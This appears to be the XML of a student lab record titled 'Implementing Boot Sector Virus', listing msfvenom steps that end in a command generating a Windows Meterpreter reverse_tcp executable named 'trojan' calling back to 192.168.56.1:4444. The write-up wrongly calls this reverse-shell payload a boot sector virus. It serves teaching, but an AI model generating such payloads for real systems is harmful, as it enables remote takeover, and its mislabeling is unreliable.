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FCDE" w14:textId="43FDCE22" w:rsidR="00A82018" w:rsidRPr="001E50E5" w:rsidRDefault="00A82018" w:rsidP="00AB2F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50E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IMPLEMENTING BOOT SECTOR VIRUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521500C" w14:textId="7DDA4D8B" w:rsidR="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FA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 No:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDD8A3" w14:textId="696F7334" w:rsidR="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FA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Date:08-05-2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F6FD16" w14:textId="65819061" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FA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FAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C7210D" w14:textId="4CC61F26" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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t>To implement BOOT SECTOR VIRUS in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D50F4" w14:textId="528A6C39" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FA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FAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Procedure :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9AB98D" w14:textId="63F9C375" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>Select the Root Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC47BA" w14:textId="61F303BC" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>Then type msfvenom command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E32980" w14:textId="7D0AE28E" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>Then get all the payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A261B7" w14:textId="1D2391FA" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>Then install gem bundler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3D98A" w14:textId="30F68728" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>The version needed to ne 1.17.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8A0EA" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>use command ( msfvenom –list-options -p windows/meterpreter/reverse_tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5FDE3" w14:textId="0A694693" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>command (msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe &gt; trojan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C68E5" w14:textId="08ADE53F" w:rsidR="00E71D63" w:rsidRPr="001E50E5" w:rsidRDefault="00E71D63" w:rsidP="00AB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t>This installs Boot Sector Virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0F196" w14:textId="37123F87" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FA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FA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823D1E8" w14:textId="4AE3C708" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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t>1.Select Root Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F397E0" w14:textId="1F575247" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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18229D" wp14:editId="6A2FA230">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-252730</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730240" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="381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018" w:rsidRPr="00AB2FAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.Type command msfvenom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA36383" w14:textId="640BAA89" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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D11442" w14:textId="332CC82E" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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lastRenderedPageBreak/>
        <w:t>3.Use command msfvenom -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58086281" w14:textId="7A1B0A7B" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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A554E3" wp14:editId="04663236">
            <wp:extent cx="5731510" cy="3689131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288" cy="369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DF7EE" w14:textId="6F650128" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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t>4.Install gem Bundler version 1.17.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA3D51" w14:textId="468D0F1C" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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489793" wp14:editId="335FF2A7">
            <wp:extent cx="5731510" cy="364183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365" cy="364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DDD3" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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8991F8" w14:textId="2603EB86" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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lastRenderedPageBreak/>
        <w:t>5.use command ( msfvenom –list-options -p windows/meterpreter/reverse_tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74004301" w14:textId="38E616AE" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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A6492" wp14:editId="54A998D7">
            <wp:extent cx="5647690" cy="69998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01"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5660053" cy="701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17C8E" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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599505" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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18683E" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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C91BFA" w14:textId="77777777" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63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D32EF8" w14:textId="647B1DBA" w:rsidR="00A82018" w:rsidRPr="00AB2FAD" w:rsidRDefault="00A82018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lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.command (msfvenom -p windows/meterpreter/reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidR="003812DF" w:rsidRPr="00AB2FAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LHOST=192.168.56.1 LPORT=4444 -f exe &gt; trojan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295722F9" w14:textId="02ECB049" w:rsidR="003812DF" w:rsidRPr="00AB2FAD" w:rsidRDefault="003812DF" w:rsidP="00AB2FAD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B2F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EF7369" wp14:editId="123865BF">
            <wp:extent cx="6260847" cy="41338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59"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6270354" cy="414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39C29" w14:textId="4FFAC137" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB2FAD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1D3302C" w14:textId="13BCC4E6" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00AB2FAD" w:rsidP="00AB2FAD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="305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FAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D51F1" w14:textId="6E9DFE49" w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidRDefault="00E71D63" w:rsidP="00AB2FAD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="30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t>Hence the BOOT SECTOR VIRUS is installed.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E71D63" w:rsidRPr="00AB2FAD" w:rsidSect="00A8201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CBA3" w14:textId="77777777" w:rsidR="00C34519" w:rsidRDefault="00C34519">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2BDCCB0D" w14:textId="77777777" w:rsidR="00C34519" w:rsidRDefault="00C345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45A39" w14:textId="77777777" w:rsidR="000F451A" w:rsidRDefault="000F45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71E81" w14:textId="77777777" w:rsidR="000F451A" w:rsidRDefault="000F45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D2C9" w14:textId="77777777" w:rsidR="000F451A" w:rsidRDefault="000F4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93C96" w14:textId="77777777" w:rsidR="00C34519" w:rsidRDefault="00C34519">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25FCA7B7" w14:textId="77777777" w:rsidR="00C34519" w:rsidRDefault="00C345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C76CC" w14:textId="77777777" w:rsidR="000F451A" w:rsidRDefault="000F45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1259C" w14:textId="5E96A0FC" w:rsidR="000F451A" w:rsidRPr="000F451A" w:rsidRDefault="000F451A" w:rsidP="000F451A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4513"/>
        <w:tab w:val="clear" w:pos="9026"/>
        <w:tab w:val="left" w:pos="6312"/>
      </w:tabs>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
      <w:t>192124215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62F32" w14:textId="77777777" w:rsidR="000F451A" w:rsidRDefault="000F45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51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9946A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65D4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0486F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376378">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="89000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18"/>
    <w:rsid w:val="000F451A"/>
    <w:rsid w:val="001E50E5"/>
    <w:rsid w:val="003812DF"/>
    <w:rsid w:val="00894164"/>
    <w:rsid w:val="00A82018"/>
    <w:rsid w:val="00AB2FAD"/>
    <w:rsid w:val="00C34519"/>
    <w:rsid w:val="00D75C4B"/>
    <w:rsid w:val="00E23082"/>
    <w:rsid w:val="00E7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BB57"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A567A7B-461E-47AB-9057-51F11F81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51A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F4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INDHU V</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-10T08:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-10T08:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>